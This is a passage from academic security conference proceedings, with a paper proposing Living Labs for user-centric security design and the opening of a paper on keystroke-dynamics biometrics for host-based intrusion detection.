problems start from the end users’ interaction with the security systems.
In defence to these assertions, usability experts argue that the end users are not the enemy in the
security chain (Adams and Sasse 1999). Smith (2003) argues that the IT infrastructure is continually full
of gaping security holes and vulnerabilities. It becomes only a matter of time before the attackers could
find and exploit these holes and vulnerabilities and quite often, they are the first ones to notice these
vulnerabilities. In essence, security breaches are inevitable given the current security mechanisms.
Furthermore, Balfanz et al. (2004) argue that end users struggle to understand information security
systems because they are complex. With the complexity of the systems, end users end up
misunderstanding the security implications of their actions. Hence, they quite often misconfigure, disable,
circumvent or completely ignore security systems to get their work done. This is why information security
systems are normally seen a necessary evil or overhead that hinders productivity (Dlamini, Eloff & Eloff
2009 and Adams & Sasse 1999).
1.1 Problem statement
Security experts continue to design and develop security systems in closed laboratories following a threat
model. With the “claim” of understanding the changing security threat landscape using the threat model,
security experts design and develop new systems to counter new security threats. These systems are
73

Moses Dlamini et al.
then tested in the artificial laboratories and after passing the tests, they get pushed to the end users (i.e.
technology dumping) with the hope that they will work as intended.
Although, these systems might work well in the laboratories, quite often they fail or become less effective
in the real-world. This is mainly because the traditional technology-centric way of developing systems is
more concerned with the functional features of the systems. It does not take into consideration the end
user requirements, problems and environment, yet this is crucial if such systems are meant to protect the
end users. This approach renders most of the existing security systems inappropriate for the end users.
Faced with the problem of inappropriate systems, end users spend a lot of time and money customizing
and tailoring the systems to better address their specific needs. Hence, there exists a surging need to
understand the end users’ requirements, needs, cultural diversity, economic and social issues, and the
environment they operate in. These must then be incorporated in the design and development of usercentric
information security systems. The end users must be actively involved at all stages of the
development.
This paper is aimed at answering the question on how we can incorporate and actively engage end users
in the design and development of information security systems. This paper proposes the use of a Living
Lab (LL) concept. This approach can help security experts to actively engage with end users early
enough to deliver user-centric systems that are driven by and best meet the user requirements.
The structure of the paper rest of the paper is as follows: Section 2 defines the concept of a LL. Section 3
presents related work. Section 4 is a discussion on how we used the Overture LL to achieve a usercentric
information security system. Section 5 concludes the paper and highlights the future direction of
this research.
2. Definition of a living lab
There are a number of definitions in literature that attempts to define a Living Lab (LL). However, there is
still no widely accepted standard definition. A move towards an accepted standard definition requires a
study of the already available definitions. It is for this reason that we outline some of the definitions in an
effort to try and find a possible common ground for all. Below, we discuss some of the definitions and
later integrate them. This is a move towards a standardized definition.
A living lab is defined as a user-driven open design ecosystem in real-life settings which is based on a
business (Private)-citizens (Public)-government partnership that enables and empowers end users to
take an active role in a fully integrated co-innovative design and development of systems (Santoro &
Conte, 2009). This is achieved by bringing end users early into the development process to identify new
and emerging user patterns and behaviour. Santoro and Conte (2009) argue that this also bridges the
gap between technology development and its uptake by all the stakeholders of the value chain. It also
allows for early assessment of the socio-economic implications of the new technology by demonstrating
the validity of its innovation.
Schumacher (2008) defines a LL as a collaboration of Public-Private-Civic-Partnership in which all
stakeholders (i.e. including end users) co-design and co-create new products, services and technologies
in real life environments. This means that end users and all stakeholders work together and each one of
them take an active role in creating new systems in a live or virtual environment.
Van der Walt et al. (2009) defines a LL as a new way for end users to actively take part in a real-time
experimental environment and, together with system developers, learn to create community-driven
innovative solutions that best meet the users’ pain-points and solve current and real world problems in a
unique way. In this definition, a LL provides users with a real time platform to experiment with solutions in
an effort to tailor them to their specific needs. The work of van der Walt et al. (2009) cites a number of
definitions from other researchers. The one that appears most comprehensive therein defines a LL as
neither a traditional research lab nor a testbed, but as an innovative platform that brings together and
engages all stakeholders at the early stage of the innovation process to experiment breakthrough
concepts and potential value for both society and end users that will lead to breakthrough innovations
(van der Walt et al. 2009).
Folstad (2008) defines a LL as an environment for engaging end users in the innovation and
development process as a way of meeting the ICT innovation challenges. This definition does not
mention anything about the type of environment i.e. testing or experimental platform.
74

Moses Dlamini et al.
From the above definitions we deduce that a LL is characterised by:
User-centric co-design and co-development
Active end user involvement
Development in a real-life setting
End user innovation is the driving force
Capture the exact user needs and context
Involves users as early as conceptualization until deployment
Add value to the end users and society at large.
For the purposes of this paper, a Living lab is defined as user-centric co-design and co-development in a
real-life environment stimulated by open co-innovation which is achieved through the participation of a
multi-stakeholder Public-Private-Civic partnership that place the end users at the centre and considers
them as active role players from the early stages of conceptualization upto deployment in an effort to
develop innovative end user-driven solutions that seek to add value to the end users and society at large.
This definition highlights the rising power of end users and the rapidly increasing pace of security product
innovation that targets specific end user pain points to build customer loyalty, facilitate entry into new
market segments and increase customer satisfaction (Sinha & Sprague 2008). The increasing end user
security demands, aided by the intensifying business competition, have forced security vendors to gain a
deep understanding of the end users’ needs and to develop an intimate relationship with them (Sinha &
Sprague 2008). In today’s business environment, only the security products that meet and exceed end
user’ expectations will thrive. Below, we discuss briefly some of the related work that has led to the
current state of affairs.
3. Related work
The relationship between end users and security experts is failing. This is because end users do not
understand security systems and they perceive them as laborious and unnecessary overheads. Security
experts, on the other hand, do not understand the end users’ needs and environment. To bridge the gap
and help facilitate a good relationship between end users and security system designers, several
researchers have conducted and explored work on Usable Security (Adams & Sasse 1999; Balfanz et al.
2004 and Payne & Edwards 2008) and Use-centric Security (Zurko & Simon 1997; Holstrom 1999; Zurko
2005; Nohlberg & Bäckström 2007; Vidyaraman 2008; Jaferian et al. 2009 and Faily & Flechais 2010)
among others.
3.1 Usable security
Security experts have joined hands with usability experts to establish usable security. This was after
security and usability were considered a trade-off, meaning that to get more of one, you would have to
sacrifice on the other. Usable security strives to find the right balance between security and usability
without really compromising on any (Braz, Seffah & M’Raihi 2007; Ben-Asher et al. 2009; Ben-Asher et
al. 2010 and Emil 2010). This approach has resulted in easy to use security systems. However, a need
still exists to go a step further to design systems that address end user needs and understand the context
within which they operate. This has lead to research on user-centred security which we discuss below.
3.2 User-centric security
Even though usable security addresses the issue of ease-of-use, a need still exists for researchers to
solve the issue of security systems that goes further to address specific end user pain points. This
change has brought about the concept of user-centred security (Zurko 2005; Jaferian et al. 2009 and
Faily & Flechais 2010) a trend that has increased with the proliferation of security products on the
security markets. It has not been clear how to achieve user-centred security, and this has led to our
proposal to use a Living Lab approach (LL), which we discuss below.
3.3 Living lab
Folstad (2008) argues that the concept of Living labs started in the nineties. Back then, it described the
cooperative partnership and live field trails (Folstad 2008). The concept of LLs is relatively new in the ICT
domain. However, today there is a growing interest in LLs. This interest is reflected in the European
75

Moses Dlamini et al.
Network of Living Labs (ENoLL) which comprises of 129 LLs (Schaffers et al. 2009). This is the biggest
network of LLs in the world that continues to grow. However, according to the authors, none of these
initiatives have tried to apply LLs on improving security systems.
3.4 Beyond the current state of affairs
The current user-centric approach has only focused on incorporating user requirements in the
development lifecycle of security systems without really engaging the end users as active stakeholders. It
is therefore crucial that security experts engage end users as active role players in the development of
innovative information security systems from conceptualization up to deployment. This is important to
achieve what Rahaman and Sasse (2010) call the concept of a “lived experience”. They define this as a
deep understanding of the relationship between end users and technology in terms of their actions and
how they interact. This concept increases the scope of user-centred security beyond the traditional
usability concept of ease-to-use (Rahaman & Sasse 2010). Therein, it is argued that there is a big risk
that terms such as “usable” and “user-centric” security remain a statement of intent and might never
come to being fulfilled (Rahaman & Sasse 2010). This is because, most of the time, the context of the
end users and the impact of security systems on their “lived experience” are not being considered. To
advance beyond the current state of affairs in usable and user-centred security systems, this paper
proposes a LL approach aimed at bringing in the “lived experience”.
And according to the authors, there is still no work that has tried to take a “lived experience” to solve the
issue beyond usable and user-centred security using a LL approach. This is the point of departure for this
paper. Below we discuss how to use a LL approach to create user-centric security systems based on the
Overture LL project.
4. Achieving a user-centric information security system based on the Overture
LL
This section begins with a brief description of the Overture LL. It goes on to discuss how the Overture LL
helped achieve user-centric security. The concepts of “secure by default” and “ground up” security are
discussed.
4.1 Overture LL
Overture LL, was initiated as part of Overture project for SAP Research Pretoria with the mandate “... to
demonstrate socio-economic feasibility of a mobile business solution for the very small enterprises in
Emerging Economies”. Project Overture was established to provide a very small enterprise (VSE) in an
emerging economy (EE), such as South Africa, with a solution to conduct its day-to-day business
activities on a mobile phone. VSEs in this context are enterprises that consist of less than 20 employees
and often do not adhere to or comply with regulatory mandates. VSEs lack financial resources and ICT
infrastructure. They exhibit high risk and uncertainty in terms of profit, growth and success.
The Overture LL was therefore established to provide support to the iterative design and development of
a “Mobile Business Services Platform” prototype for the VSEs. The prototype was tried and tested in a
real-world environment with real end users chosen from the plumbing industry as a selected vertical
sector. The plumbers along with other stakeholders such as SAP Research Pretoria (a technology
provider), CashBuild and PlumbLink (plumbing suppliers), Institute of Plumbers of South Africa,
government agencies working with VSEs and a telco intermediary that hosts the prototype, have been
actively involved in the whole process from the beginning of the project to the end providing a lived
experience.
The plumbers provided their direct or indirect input (through feedback on their evaluation of the system as
they interact with it on a day-to-day basis) at all stages of design and development of the prototype. Their
inputs were quickly put to test and necessary alterations made; those that were not feasible were
discarded with a clear explanation and the feasible ones were incorporated in the next iteration. For
example, at the beginning of the exercise, all the users of the system were classified as end users. But as
the plumbers, project managers, financial controllers and administrators began to work with the system, a
concern was raised about the principles of “separation of duties”, “need to know” and the classification of
information, which was then implemented in the next version. This gave our end users a strong sense of
belonging and ownership – a key success factor for acceptance and adoption of the final solution.
Moreover, this provided both parties with a guarantee that the final product will address the exact needs
76

Moses Dlamini et al.
of the target niche market and the end users will be happy about the product that they help build – a winwin
situation indeed.
4.2 Operations of the Overture LL
The diagram below shows how the Overture LL approach incorporated the end user requirements, inputs
and context through each step of the security development lifecycle (SDL) (Lipner & Howard, 2005).
Figure 1: A Living Lab based user-centric information security design process
The design process started with all stakeholders drafting the mandate and clear scope of the project. This
was followed by the requirements analysis process which included a threat analysis, risk analysis,
usability requirements and vulnerability analysis. The threat analysis was conducted to get a
comprehensive view of the potential threats of the proposed system. The vulnerability analysis, which
was conducted after the first iteration, examined the potential security holes within the system. The risk
analysis built on the threat and vulnerability analysis by identifying the risk associated with the threats
and vulnerabilities. The usability requirements were developed by our usability experts to provide the
system with ease-of-use to help remove the complexity that is normally associated with information
security systems.
From this process, the system requirements as well as end user requirements were documented to
provide inputs to the specification document. We then developed a conceptual model on a whiteboard
and this was put into design and then later sent to the development team. This system was developed
and tested by the end users. The end users feedback helped us to refine our scope and mandate on the
second iteration and all the identified vulnerabilities were patched and the system went through the same
processes and all the time being open for the end user’ inputs until everyone was happy with the final
product.
The Overture LL has really provided the end users with a platform to actively provide their direct or
indirect input into the system, either through their requirements, inputs (in form of feedback and
comments) and the context (in terms of the operating conditions and environment). It puts the end users
at the centre of design and development. Taking this approach facilitates the implementation of a truly
user-centric approach to security systems. Below are some of the concepts that were further
implemented in the process of the system development.
4.3 Secure by default
A lesson learnt in the Overture LL was that even in a LL environment; end users still need to be sure that
the system in design and development is secure, dependable and reliable. It is very important that all the
necessary security measures are put in place more especially at the design, development and pilot
77

Moses Dlamini et al.
phase. This is because it is at this phase that the end users get to have a hands-on experience with the
systems. If their first impression is that the system is not secure enough, they would be easily
discouraged from using the system. From the onset, we assured them and made them aware that the
system is secure and it adequately protects their privacy and information assets.
All systems, even those which are under development or at the pilot phase, should be made to be
“secure by default” meaning that their default security configuration settings must be the most secure
settings possible (Miller 2004 and Lipner & Howard 2005). Quite often when system settings are set to
the most secure state, they work only for selected options that they are meant to work for and nothing
more than that. They run with the least necessary privileges and all else that is unnecessary is disabled
or blocked. We carefully analyzed the roles and the day-to-day work of the end-users and based on that
we determined their least privileges.
Of note also is that the “secure by default” approach must be taken with extra caution to avoid security
hindering end users from executing their daily duties. In most cases, the most secure configuration
settings are not user friendly settings. Most end users will have difficulties in working with them, which
might cause them to circumvent the security systems that are meant to protect them from threats.
Consider, for example, an end user suggesting that all communications must be encrypted and anti-virus
be installed on all the mobile phones. This would consume a lot of processing power, which might cause
the system to be slow and therefore delay the end users from executing their day-to-day duties. Even
though this would have provided us with a highly secure system, it would have been overkill and hence, it
was excluded.
4.4 Ground up security
In this paper, a “ground up” approach refers to the process of developing security systems starting from
the needs and requirements of the target end users on the ground (Ghosh, Howell & Whittaker 2002;
Vacca 2010:17). Only a “ground up approach” has the potential to help security system designers and
developers to develop systems that are in line with what the end users need. Systems meant for the end
users definitely require end user input and the end users must be treated as the major stakeholder.
The target end users on the ground are required to continue providing their inputs throughout the lifecycle
of the development process in an iterative manner as reflected in figure 1. This means that, after the
system has been developed, it goes to the end users for testing and evaluation. The end users provide
their feedback, which is taken as input to the next iteration of the design and development cycle. The
Overture LL environment provided the platform to ensure that all requirements, especially those from end
users, were considered early enough to avoid technology misappropriation.
5. Conclusion and future work
A LL approach is one way of achieving user-centred security systems. However, it is worth noting that a
LL approach is not a silver bullet towards solving the issue of user-centric design and development of
security systems, it is just one piece of the puzzle. With the emphasis on the end users, the limitation of
this approach is that it is likely to dictate only the inclusion of features in response to the end user needs,
which quite often are not even feasible to implement. Surely, a LL approach will put more focus on the
end users, but knowing what the end users need and then providing them exactly that may not be good
enough. This was one of the key lessons learnt. If we are to design technology game-changers with the
potential to make a real socio-economic difference to society, it requires that we look beyond what the
end users need, into the things that they are not even aware they need. This will require an insightful
understanding and visibility of the end user needs, motivations, context, conditions, behaviour and
environment. We need to understand the end users more than they do themselves in a similar manner to
that of customer profiling which determines the risk profile or creditworthiness of potential customers in
insurance companies and financial institutions, respectively. The Overture LL has provided us with just
that.
A comprehensive view to security system design and development will include requirements that are
raised by the need to comply with industry standards and regulatory compliance mandates. Best
practices, functional and non-functional requirements complete the other pieces of the puzzle. This is left
as future work.
78

Acknowledgement
Moses Dlamini et al.
The support of SAP Research Pretoria/Meraka Unit of Technology Development/National Research
Foundation towards this research is hereby acknowledged. Opinions expressed and conclusions arrived
at are solely those of the authors and should not necessarily be attributed to SAP Research/Meraka UTD/
National Research Foundation. We would like to thank Rubina Adam and Prof. Marlien Herselman for
their insightful comments and contribution to this paper.
References
Adams, A. and Sasse, M.A. (1999). Users are not the Enemy: Why Users Compromise Computer Security
Mechanisms and How to Take Remedial Measures, Communications of the ACM, Vol. 42, No. 12, December
1999, pp. 40-46.
Asher, C., Aumasson, J.-P. and Phan, R. C.-W. (2009), Security and privacy preserving in human-involved networks,
in the 50 th Proceedings of the iNetSec Conference, 23-24 April 2009, Zurich, Switzerland.
Balfanz, D., Durfee, G., Smetters, D.K. and Grinter, R.E. (2004). In Search of Usable Security: Five Lessons from the
Field, Journal of the IEEE Security and Privacy, IEEE Computer Society, September/October 2004, Vol. 2, No.
5, pp. 19-24.
Ben-Asher, N., Meyer, J., Möeller, S. and Englert, R. (2009). An Experimental System for Studying the Tradeoff
between Usability and Security, ares, pp.882-887, 2009 International Conference on Availability, Reliability and
Security, 2009, Fukuoka, Japan.
Ben-Asher, N., Meyer, J., Parmet, Y., Moeller, S. and Englert, R. (2010). An experimental microworld for evaluating
the trade-off between usability and security, The 6 th Symposium On Usable privacy and Security, SOUPS 2010,
14-16 July 2010, Redmond, WA.
Braz, C., Seffah, A. and M’Raihi, D. (2007). Designing a Trade-off between Usability and Security: A metrics based-
Model, Human-Computer Interaction,INTERACT 2007, Lecture Nones in Computer Science, 2007, Vol. 4663,
No. 2007, pp. 114-126.
Dlamini, M.T. (2010). The Economics of Information Security, MSc dissertation, University of Pretoria, available at:
http://upetd.up.ac.za/thesis/available/etd-09202010-174918/, accessed 08 January 2011.
Dlamini, M.T., Eloff, J.H.P. and Eloff, M.M.(2009). Information Security: The Moving Target, Computers & Security
Journal, Elservier, Vol. 28, No.3-4, May-June 2009, pp. 189-198.
Emil, J. (2010). Security – Functionality –Usability Trade-off, available online at:
http://emilonsecurity.wordpress.com/2010/10/17/security-functionality-usability-security-trade-off/, accessed 11
January 2011.
Faily, S. and Flechais, I. (2010), Security Through Usability: A user-centered approach for balanced security policy
requirements, 2010 Annual Computer Security Applications Conference, ACSAC 2010, 6-10 December 2010,
Texas, USA.
Folstad, A. (2008). Living Labs For Innovation and Development of Information and Communication Technology: A
Literature Review, The Electronic Journal for Virtual Organizations and Networks, Vol. 10, Special Issue on
Living labs, August 2008, pp. 99-131.
Ghosh, A.K., Howell, C. and Whittaker, J.A. (2002). Building Software Securely from the Ground Up, Journal of IEEE
Software, IEEE Computer Society Press, Vol. 19, No. 1, January/February 2002, pp. 14-16.
Holmstrom, U. (1999). User-centered design of security software, The 17 th International Symposium of Human
Factors in Telecommunications, May 1999, Copenhagen, Denmark.
Izadi, S., Hodges, S., Butler, A., West, D., Rrustemi, A. and Molloy, M. (2009). ThinSight: a thin form-factor
interactive surfacetechnology, Communications of the ACM, Vol. 52, No. 12, December 2009, pp: 90-98.
Jaferian, P., Botta, D., Hawkey, K. and Beznosov, K. (2009). A multi-method approach for user-centered design of
identity management systems, The 5 th Symposium On Usable Privacy and Security, SOUPS 2009, 15-17July
2009, Mountain View, Canada.
Lipner, S. and Howard, M. (2005). The Trustworthy Computing Security Development Lifecycle, White Paper,
Microsoft Corporation, March 2005, available online at: http://msdn.microsoft.com/en-us/library/ms995349.aspx,
accessed 12 January 2011.
Miller, J. (2004). Why “Secure By Default” is a step in the right direction, available online at:
http://www.securityfocus.com/columnists/241, accessed 12 January 2011.
Miller, M.J. (2010). Cybersecurity 2010: Technology alone cannot solve this problem,
Available online at: http://blogs.globalcrossing.com/?q=content/cybersecurity-2010-technology-alone-cannot-solveproblem,
accessed 08 January 2011.
Nohlberg, M. and Bäckström, J . (2007) "User-centred security applied to the development of a management
information system", Journal of Information Management & Computer Security, Vol. 15, No. 5, pp. 372 – 381.
Patrick, A.S., Long, A.C. and Flinn, S. (2003). HCI and Security Systems, HCI and Security Systems: A CHI 2003
Workshop, CHI 2003, 5-10 April 2003, Florida, USA.
Payne, B.D. and Edwards, W.K. (2008). A brief introduction to Usable Security, IEEE Journal of Internet Computing,
Vol.12, No. 3, May 2008, pp. 13-21.
Rahaman, A. and Sasse, M.A. (2010). A framework for the lived experience of identity, IDIS 2010, Vol. 3, No. 3,
December 2010, pp. 605-638.
79

Moses Dlamini et al.
Santoro, R. and Conte, M (2009). Living Labs in Open Innovation Functional regions, Whitepaper, available online at:
http://www.ami-communities.eu/pub/bscw.cgi/d441945/Living%20Labs%20in%20Functional%20Regions%20-
%20White%20Paper.pdf, accessed 20 December 2010.
Sasse, A.M., Brostoff, S. and Weirich, D. (2001). Transforming the Weakest Link – a Human/Computer Interaction
Approach to Usable and Effective Security, BT Technology Journal, Vol. 19, No. 3, 1 July 2001, pp. 122-131.
Schaffers, H., Merz, C., Guzman, J.G. and Navarro, M. (2009). Living Labs and Rural Development Overview of the
C@R Project, The Electronic Journal for Virtual Organizations and Networks, eJOV, Vol. 11, 2009, pp. 1-8.
Schneier, B. (2000). Secrets and Lies: Digital security in a networked world, John Wiley and Sons, Inc, USA.
Schumacher, J. (2008). Living Labs in Future ICT Research, Presentation Slides, Swiss ICT Summit, 10 October
2008, Lugano, Swirtzerland, available online at: http://www.ictsummit.eu/template/fs/documents/10_LL-
Schumacher.pdf, accessed 08 December 2010.
Sinha, A. and Sprague, S. (2008). Business Beyond Boundaries: Gaining Competitive Advantage in a Global
Economy, A Joint SAP and Crossgate WhitePaper, available online at:
http://www.edispecialists.com/newsletter/SAP_and_Crossgate_Business%20Network%20Transformation.pdf,
accessed 08 December 2010.
Smith, S.W. (2003). Humans in the Loop: Human-Computer Interaction and Security, IEEE Security & Privacy
Journal, IEEE Computer Society, Vol. 1, No. 3, May 2003, pp. 75-79.
Vacca, J.A. (2010). Managing Information Security, Elservier 2010, USA.
Van der Walt, J.S., Buitendag, A.A.K., Zaaiman, J.J. and van Vuuren, J.C.J. (2009). Community Living Lab as a
Collaborative Innovation Environment, Journal of Information Science and Information Technology, Vol. 6, No.
2009, pp. 421-436.
Vidyaraman, S. (2008). Gust: Game Theoric user-centered security design technique, PhD Thesis, State University
of New York, USA.
Zurko, M. E. (2005). User-centered Security: Stepping Up to the Grand Challenge, Proceedings of the 21 st Annual
Computer Security Applications Conference, ACSAC 2005, IEEE Computer Society, 5-9 December 2005,
Tucson, Arizona.
Zurko, M.E. and Simon, R.T. (1997). User-centered Security, Proceedings of the 1996 New Security paradigms
Workshop, CA.
80

Intrusion Detection Through Keystroke Dynamics
João Ferreira 1, 2 , Henrique Santos 1 and Bernardo Patrão 2
1
University of Minho, Braga, Portugal
2
Critical Software S.A., Coimbra, Portugal
jpedrossferreira@gmail.com
hsantos@dsi.uminho.pt
bnf-patrao@criticalsoftware.com
Abstract: With the ever-increasing number of internal attacks towards information systems, Intrusion Detection
Systems (IDSs) have become a necessary addition to the security policy of nearly every organization. An IDS is
responsible for monitoring the events occurring in a computer system or network and analyzing them for signs of
possible violation of security policies. At the Host level, current IDSs (Host-Based IDSs) typically perform file integrity
checking, key file system objects monitoring, log analysis, among other functions capable of revealing malicious
alterations of the system state. A major drawback of this approach is its natural limitation to detect “legal” operations
when performed by an intruder after getting access through legitimate credentials, possibly causing considerable
damage. Currently, authentication mechanisms are the only barrier to prevent these attacks. The most common
means of authentication includes passwords, often used in conjunction with tokens or biometric readings, for
increased security. However, these mechanisms do not offer continuous verification like IDSs do. One promising
solution for this issue is to extend the IDS concept to the user authentication level, using Anomaly-based detection to
distinguish benign activity from malicious activity. Applying this concept with focus on the user requires tracking user
profiles, leading us to biometric features. Keystroke Dynamics is a behavioral biometric technique that satisfies this
goal. Besides being non-intrusive and inexpensive, keystroke analysis is also very attractive because typing patterns
are continuously available after the authentication phase. The development of such IDS is the main motivation for the
work described in this paper. In order to preserve the attractiveness of this technology, the solution will face a set of
challenges. It should be transparent to the user, and therefore the execution (gathering typing rhythms, building user
samples, computing comparison scores, and refining the stored profile through learning) will need to be performed
without imposing restrictions to user input and without visual interface. It must also be generic concerning the
keyboard type. Other important challenges come from the need to deal with unrestrained text input. Lastly, the
security of captured data and the possibility of allowing future prevention measures by offering asynchronous
detection capabilities are also considered.
Keywords: keystroke dynamics, biometrics, host-based intrusion detection, authentication, security, anomaly-based
detection
1. Introduction
Critical information is being progressively handled in digital format, a consequence of the reigning
Information Era. Proportionately, as the value of digital information escalates, cyber-attacks become
increasingly threatening, and popular. Protecting that information is therefore a growing necessity.
Among several security technologies that emerged, User Authentication (within the context of Access
Control Policies) plays a very important role as a first control concerning user/machine interaction.
Password-based authentication mechanisms are currently the most common way to assure the user is
who he/she is supposed to be.
To the trusted user, authentication mechanisms offer a reasonable layer of protection against intruders.
However, after the authentication phase is passed, the user is successfully identified and no further proof
of identity is usually required. This lack of continuous identity verification is a severe access control
vulnerability that allows for opportunist attacks, especially from insiders. Insiders are unavoidable,
trusted, have access and opportunity. Studies show that 60 to 70 percent of cyber-attacks come from
insiders (Lynch, 2006), and several are ignored by these statistics, since a significant number of insider
attacks explore some sort of password abuse and are not detected (Schultz, 2002).
For example, whenever a user leaves its workstation in a logged in state, an attacker nearby can use it to
access critical information; in another ordinary scenario, an intruder can persuade a legitimate user to let
him use his computer to just read the mail or do other apparently innocent task, and, maliciously, do
something else. Mitigating this threat with more frequent authentication challenges is not a valid option,
since it would be inconvenient to the user, which could ultimately look for workarounds that would pose
even greater security risks. Therefore, a better solution is the adoption of a technique that passively and
continuously monitors the user’s interactions, searching for some proof of intrusion.
81

João Ferreira et al.
Host-based Intrusion Detection Systems (HIDSs) satisfy most of these conditions. However, current IDSs
are focused on the system (instead of the user). As a consequence, system-safe actions are considered
legal (no matter who is really behind those actions), and it is still possible (in fact, very easy) for an
attacker to execute malicious actions even with such a security control in place.
To better address that issue, we propose a solution based on keystroke dynamics biometrics, adequately
adapted to the intrusion detection operation. In this paper we describe the architecture of the solution and
the keystroke dynamics method implemented to passively and continuously authenticate the user. In
section 2 biometric concepts are introduced and justified as the correct option for user authentication,
within the context of a HIDS function. In section 3, the option on Keystroke Dynamics is explained, as
well as different approaches published in the literature, for similar applications. Section 4 contains a
description of related work. In section 5 we describe the architecture of the proposed solution, giving
details of its main modules, and explaining how key concepts were addressed, during the design phase.
Section 6 describes the experimental environment of this solution, and we wrap up the paper with some
concluding remarks on section 7.
2. Biometrics
Biometric technologies can be used for two main objectives: identification and authentication. In the
former case, a biometric trait is used for matching processing against the entire content of a previously
captured biometric database – this can be a huge problem, especially for very large databases. In the
latter case a biometric trait is used to verify if it matches with one previously stored and belonging to the
user enrolled with the system – the matching process is simpler, but precision is a main concern to avoid
false negatives (negative authentication of a legitimate user) and false positives (positive authentication
of an impersonator).
Before taking biometric technologies as a solution for the authentication problem it is useful to compare it
with alternatives.
Authentication mechanisms are typically divided into three classes (Liu and Silverman, 2001):
Based on something the user knows (or knowledge based) – the most common means of
authentication, includes passwords and personal identification numbers (PINs). These suffer from the
possibility of being easily duplicated, even without the user’s consent. Complex passwords can be
forgotten (and because of that they are often stored or written, increasing the risk of theft), while
simple passwords may be easily guessed, cracked or offered to an ill-intentioned con artist.
Based on something the user has (or possession based) – keys and authentication tokens. Usually
used in conjunction with PINs or passwords, these help increasing security, but can be easily lost,
borrowed or stolen.
Based on something the user is (or identity based) – the field of biometric security. While being
currently the least commonly deployed mechanisms in computer systems, they are believed to
represent an effective mean of authentication. More importantly, with the added bonus of better
protection of the authentication data from duplication, loss or theft, since the data source is the user
in question. Concerning user intrusion detection based on authentication, biometrics is the only
technology that allows an effective link between users and respective credentials. So, it is on
biometric analysis that this paper is focused.
Biometric features are commonly divided into two categories: physiological and behavioral features. The
physiological features include face, retinal or iris patterns, fingerprints, palm topology, hand geometry,
wrist veins and thermal images. On the other hand, behavioral features include voiceprints, keystroke
dynamics, handwritten signatures and gait (Bergadano, Gunetti and Picardi, 2002).
Physiological features are currently the most successfully implemented, due to the high variability of
behavioral features – which can greatly vary between consecutive samplings, since they are dependent
of a human user’s performance. Another drawback of many biometric techniques is the requirement of
specific equipment, such as scanners or special cameras, in order to sample the required characteristics.
Most users are also wary of using intrusive equipment (such as retinal scanners, for example).
On the HIDS context, a biometric technique can only be used if the user’s analyzed trait can be
continuously sampled – which is rare for this kind of techniques. An attractive biometric technique would
perform transparently and continuously without any additional equipment.
82

3. Keystroke dynamics
João Ferreira et al.
Fortunately it has been demonstrated that distinctive neurophysiological factors influence the typing
patterns of human users interacting with a keyboard (Marsters, 2009). Using the keyboard as a source of
biometric information is especially appealing due to the ever-availability of typing rhythms, independent of
an authentication phase being passed (or fooled).
Concerning the user’s typing dynamics, on a standard keyboard connected to a Personal Computer we
can extract the amount of time each key is held down (called dwell time), and the elapsed time between
the release of the first key and the depression of the second (called flight time) (Monrose and Rubin,
2000). These atomic features are usually merged to form n-graphs, representing consecutive keystrokes
(digraphs, trigraphs and fourgraphs being the most widely sampled graphs). Recent laptops feature 3-D
accelerometer chips, and research on vibration-sensitive keystroke analysis has showed promising
results (Lopatka and Peetz, 2009; Iwasaki, Miyaki and Rekimoto, 2009). However, this metric would not
be usable on most situations (desktop computers; external keyboards; older laptops), harming the
desired generality. The possibility of using distance between keys as a valid metric was also studied, to
no avail (Magalhães, 2005).
Apart from the natural unreliability of the human user as a data source, a factor intrinsic to all behavioral
biometric measuring, an authentication system based solely on keystroke timing information is of course
susceptible to other problems. A considerable number of potential sources of noise might shift the user’s
behavior away from their normal typing profile. J.-D. Marsters (2009) listed some examples: weather
conditions (a cold day might mean that a typist’s fingers move more slowly), fatigue and stress, injury,
and even a simple distraction (common in an office environment). All these factors can add a significant
amount of noise to an otherwise consistent typing.
These variations will inevitably induce false-positives and false-negatives on any behavioral biometric
based system. Valid solutions using keystroke dynamics need to take them into account, and try to
mitigate their occurrences as much as possible.
4. Related work
In order to minimize the aforementioned typing instability, most research on published literature chooses
to control the text used to produce samples, asking for usernames, passwords, or fixed text paragraphs
(Robinson et al., 1998; Lopatka and Peetz, 2009; Jiang, Shieh and Liu, 2007). It is believed that users
tend to type familiar and well-practiced phrases with a more consistent rhythm (Robinson et al., 1998).
There are currently very few approaches to the keystroke analysis of unrestrained text. Ahmed and
Traore (2005) obtained a False Acceptance Rate (FAR) of 1.312% and a False Rejection Rate (FRR) of
0.651%, using trigraph-based keystroke analysis in conjugation with pointer dynamics. Unfortunately, the
information provided about the experimentation process is very scarce.
Downland and Furnell (2004) monitorized 35 subjects for 3 months (nearly 6 million samples), obtaining a
FRR of 4.9% for a FAR of 0%, which are very interesting results but obtained via a computational-heavy
process that would be impossible to implement on a system that needs to provide quick responses.
J.-D. Marsters (2009) developed a system for transparent keystroke analysis with a FAR of around 2%
for a near-zero FRR and a small userbase of 10 participants. The author claims to be able to perform an
identity verification in less than a minute, which is a result close to being acceptable for a “real” intrusion
detection system.
Finally, Gunetti and Picardi (2005) thoroughly researched the impact of multiple parameter variations in
their study, obtaining (for a userbase of 205 participants) a very interesting FRR of less than 5% and FAR
of less than 0.005% for their best-scoring implementation. Their two-factor (absolute and relative) scoring
algorithm served as the basis for our proposed solution. Samples were obtained by filling an online text
box (which guarantees that nearly every sample will be constituted of real text), which can not be
considered an unrestrained text input – including coding, browsing, gaming, writing in different contexts
and languages, etc.
83

5. Proposed solution
João Ferreira et al.
Figure 1 depicts the architecture of our proposed solution. Like typical systems based on biometric
technology, this solution includes an initial enrollment phase, where the legitimate user is required to type
a few lines of text (sample length will be discussed throughout this section) so that sufficient sample data
is gathered. From that point on, the system is ready to recognize legitimate use, and enters validation
phase, the "normal" state that will be preserved during operation.
In this state, every validation attempt (every typed sample) will be matched against the user's typing
profile, outputting a score that will determine if the attempt is valid. An attempt that passes validation will
be added to the stored profile, ensuring that the user’s profile is constantly updated, accompanying
evolutions of the user’s typing dynamics). Attempts that fail to validate denunciate the presence of an
intruder and will trigger the prevention and reporting module. In the next sections we detail each of the
main modules of the proposed solution.
Figure 1: Architecture of the proposed solution
5.1 Event logging
This module is a lightweight software agent running in the background of every registered user’s
computer. It continuously logs the sequence of keystroke events (keydowns and keyups) generated by
the user’s typing, along with elapsed time measurements (with an accuracy of .01 milliseconds). This
module is also responsible for filtering out unwanted events, like function keys, modifier keys, auto-repeat
events (when a key is depressed for more than half a second) and writing breaks. Table 1 exemplifies
